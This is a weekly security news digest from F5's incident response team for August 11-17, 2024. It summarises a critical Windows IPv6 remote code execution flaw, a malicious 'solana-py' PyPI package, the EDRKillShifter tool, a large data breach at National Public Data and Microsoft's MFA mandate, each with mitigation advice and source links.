Windows Critical RCE Vulnerability, Malicious Solana-py, and EDRKillShifter
Notable security news for the week of Aug 11th-17th 2024, brought to you by the F5 Security Incident Response Team. This week your editor is Dharminder. In this edition, I have security news about critical TCP/IP remote code execution (RCE) vulnerability in all Microsoft Windows systems using IPv6, a malicious package “solana-py” on the Python Package Index (PyPI), EDRKillShifter a tool to disable endpoint detection and response (EDR) software on compromised systems, 2.7 billion data records stolen from National Public Data and Microsoft’s announcement on enabling MFA by October 2024.
We in F5 SIRT invest lot of time to understand the frequently changing behaviour of bad actors. Bad actors are a threat to your business, your reputation, your livelihood. That’s why we take the security of your business seriously. When you’re under attack, we’ll work quickly to effectively mitigate attacks and vulnerabilities, and get you back up and running. So next time you are under security emergency please contact F5 SIRT.
Ok let's get started and the find details of security news.
Microsoft Windows TCP/IP Critical RCE Vulnerability
Microsoft has issued an urgent warning to patch a critical TCP/IP remote code execution (RCE) vulnerability, tracked as CVE-2024-38063, that affects all Windows systems using IPv6, which is enabled by default. Discovered by XiaoWei from Kunlun Lab, the vulnerability stems from an Integer Underflow issue that can lead to buffer overflows, allowing attackers to execute arbitrary code on vulnerable systems. Microsoft labeled the exploit as "more likely" to be used in attacks, making it a high-priority threat. The vulnerability is particularly dangerous because it can be exploited remotely by sending specially crafted IPv6 packets repeatedly. Although disabling IPv6 can mitigate the risk, Microsoft cautions that doing so may cause system disruptions, as IPv6 is integral to modern Windows versions. This flaw is comparable to previous severe IPv6 vulnerabilities patched by Microsoft, underscoring the ongoing security risks associated with IPv6. Users are strongly advised to apply the latest security updates immediately to protect their systems.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
Malicious Package - solana-py on Python Package Index PyPI
Cybersecurity researchers have identified a malicious package on the Python Package Index (PyPI) called "solana-py," which falsely claims to be associated with the Solana blockchain platform. The legitimate Solana Python API library is named "solana" on PyPI and "solana-py" on GitHub. Exploiting this naming discrepancy, the threat actor released a fraudulent "solana-py" package on PyPI, designed to steal Solana blockchain wallet keys. The rogue package, which had 1,122 downloads before its removal, mirrored the real package's code but included additional malicious code in the __init__.py script to exfiltrate sensitive data to a domain controlled by the attacker. This package posed a significant supply chain risk, as even legitimate libraries like "solders" have referenced it in their documentation, potentially spreading the attack further. This incident highlights the critical need for developers to carefully verify the authenticity of software packages to protect against similar supply chain attacks.
https://thehackernews.com/2024/08/rogue-pypi-library-solana-users-steals.html
EDRKillShifter- Tool to Disable EDR
Sophos analysts discovered a new tool named EDRKillShifter, deployed by a cybercriminal group in a failed attempt to execute a ransomware attack using RansomHub. EDRKillShifter is a "bring your own vulnerable driver" (BYOVD) tool. It acts as a loader that delivers a legitimate but vulnerable driver, which is then exploited to gain elevated privileges and disable security defenses. This discovery underscores a rising trend in sophisticated malware targeting EDR systems, as seen in other tools like AuKill. To mitigate such threats, Sophos advises enabling tamper protection, maintaining strict separation of user and admin privileges, and regularly updating systems to prevent the abuse of vulnerable drivers.
https://news.sophos.com/en-us/2024/08/14/edr-kill-shifter/
https://thehackernews.com/2024/08/ransomhub-group-deploys-new-edr-killing.html
2.7 Billion Data Records Stolen
A significant data breach has exposed 2.7 billion records of personal information for U.S. residents, including names, social security numbers, and addresses. The data was reportedly stolen from National Public Data, a company that gathers and sells personal information for background checks and investigations. Initially, a threat actor named "USDoD" claimed to have stolen 2.9 billion records and attempted to sell them for $3.5 million. However, the most extensive version of the stolen data was later leaked for free on a hacking forum by a different threat actor known as "Fenice," who claimed that the breach was actually carried out by another actor named "SXUL." The leaked data, which consists of unencrypted information, includes multiple records per person, making it inaccurate in some cases. This breach has sparked multiple class action lawsuits against National Public Data for failing to protect sensitive information. Individuals affected by the breach are advised to monitor their credit reports for fraudulent activity and be cautious of phishing attempts, as previously leaked samples also included phone numbers and email addresses.
https://www.foxnews.com/tech/2-7-billion-records-leaked-massive-us-data-breach
Microsoft’s Announcement - Enable MFA by October 15 2024
Microsoft has urged Entra global admins to enable multi-factor authentication (MFA) by October 15, 2024, as part of the Secure Future Initiative (SFI). This mandate is designed to protect Azure accounts from phishing and hijacking by requiring MFA for all Azure sign-ins. While admins can delay enforcement until April 15, 2025, Microsoft warns that doing so increases security risks. The company has sent notifications to admins, emphasizing the need for immediate MFA setup to secure cloud resources. Starting in October, MFA will be mandatory for accessing admin portals like Microsoft Entra admin center, Intune admin center, and the Azure portal. By early 2025, MFA enforcement will extend to Azure PowerShell, Azure CLI, Azure mobile apps, and Infrastructure as Code (IaC) tools. Microsoft highlights that MFA significantly enhances account security, with studies showing it reduces account compromise risk by over 98%.
Published Aug 23, 2024
Version 1.0
No CommentsBe the first to comment